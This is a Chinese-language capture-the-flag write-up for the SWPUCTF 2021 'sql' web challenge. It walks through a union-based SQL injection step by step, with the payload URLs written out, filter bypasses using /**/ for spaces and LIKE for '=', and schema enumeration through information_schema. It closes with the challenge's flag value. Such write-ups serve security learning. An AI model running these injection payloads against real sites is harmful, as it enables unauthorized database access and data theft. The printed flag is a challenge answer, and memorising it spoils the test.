[SWPUCTF 2021 新生赛]sql
题目来源:nssctf
题目类型:web
涉及考点:SQL注入
1. 又是熟悉的杰哥,先尝试判断闭合类型、回显列数
![](https://images.cnblogs.com/cnblogs_com/blogs/729425/galleries/2340843/o_230902134441_image-20230902203813896.png)
- 判断闭合类型:
/?wllm=1
:
![](https://images.cnblogs.com/cnblogs_com/blogs/729425/galleries/2340843/o_230902134441_image-20230902204000113.png)
/?wllm=1'
:
![](https://images.cnblogs.com/cnblogs_com/blogs/729425/galleries/2340843/o_230902134441_image-20230902204031765.png)
/?wllm=1'%23
:
![](https://images.cnblogs.com/cnblogs_com/blogs/729425/galleries/2340843/t_230902134441_image-20230902204103316.png)
%23是#的url编码
判断得到闭合类型为单引号闭合
- 判断回显列数:
/?wllm=1' group by 3%23
:
![](https://images.cnblogs.com/cnblogs_com/blogs/729425/galleries/2340843/o_230902134441_image-20230902204235207.png)
这里是过滤了空格,我们用
/**/
来绕过
/?wllm=1'/**/group/**/by/**/3%23
:
![](https://images.cnblogs.com/cnblogs_com/blogs/729425/galleries/2340843/o_230902134441_image-20230902204337367.png)
/?wllm=1'/**/group/**/by/**/4%23
:
![](https://images.cnblogs.com/cnblogs_com/blogs/729425/galleries/2340843/o_230902134441_image-20230902204426345.png)
判断得回显列数为3
2. 尝试union注入
- 判断回显位:
/?wllm=-1'/**/union/**/select/**/1,2,3%23
:
![](https://images.cnblogs.com/cnblogs_com/blogs/729425/galleries/2340843/o_230902134441_image-20230902204655967.png)
- 爆库名:
![](https://images.cnblogs.com/cnblogs_com/blogs/729425/galleries/2340843/o_230902134503_image-20230902204718147.png)
- 爆表名:
/?wllm=-1'/**/union/**/select/**/1,2,group_concat(table_name)/**/from/**/information_schema.tables/**/where/**/table_schema/**/like/**/database()%23
![](https://images.cnblogs.com/cnblogs_com/blogs/729425/galleries/2340843/o_230902134503_image-20230902204928173.png)
此处是过滤了
=
,用like
来绕过
- 我们直接查看
LTLT_flag
的内容,爆字段名:
/?wllm=-1'/**/union/**/select/**/1,2,group_concat(column_name)/**/from/**/information_schema.columns/**/where/**/table_schema/**/like/**/database()%23
![](https://images.cnblogs.com/cnblogs_com/blogs/729425/galleries/2340843/o_230902134524_image-20230902205107049.png)
- 查询flag:
/?wllm=-1'/**/union/**/select/**/1,2,group_concat(flag)/**/from/**/test_db.LTLT_flag%23
![](https://images.cnblogs.com/cnblogs_com/blogs/729425/galleries/2340843/o_230902134525_image-20230902205217716.png)
发现显示不全,我们使用substring
连接:
/?wllm=-1'/**/union/**/select/**/1,2,substring(group_concat(flag),1,30)/**/from/**/test_db.LTLT_flag%23
![](https://images.cnblogs.com/cnblogs_com/blogs/729425/galleries/2340843/o_230902134503_image-20230902212438008.png)
发现被过滤了,换mid
试试:
/?wllm=-1'/**/union/**/select/**/1,2,mid(group_concat(flag),1,20)/**/from/**/test_db.LTLT_flag%23
![](https://images.cnblogs.com/cnblogs_com/blogs/729425/galleries/2340843/o_230902134503_image-20230902212907354.png)
/?wllm=-1'/**/union/**/select/**/1,2,mid(group_concat(flag),21,20)/**/from/**/test_db.LTLT_flag%23
![](https://images.cnblogs.com/cnblogs_com/blogs/729425/galleries/2340843/o_230902134525_image-20230902212922216.png)
/?wllm=-1'/**/union/**/select/**/1,2,mid(group_concat(flag),41,20)/**/from/**/test_db.LTLT_flag%23
![](https://images.cnblogs.com/cnblogs_com/blogs/729425/galleries/2340843/o_230902134525_image-20230902212941548.png)
注意:mid最大回显长度为20个字符
拼接一下即可得到flag:
NSSCTF{ad72b551-c7a7-4a13-abf2-3a0311d8d7cf}
日期:2023.9.2
作者:y0Zero
标签:group,23,union,SWPUCTF,wllm,flag,2021,sql,select From: https://www.cnblogs.com/bkofyZ/p/17674252.html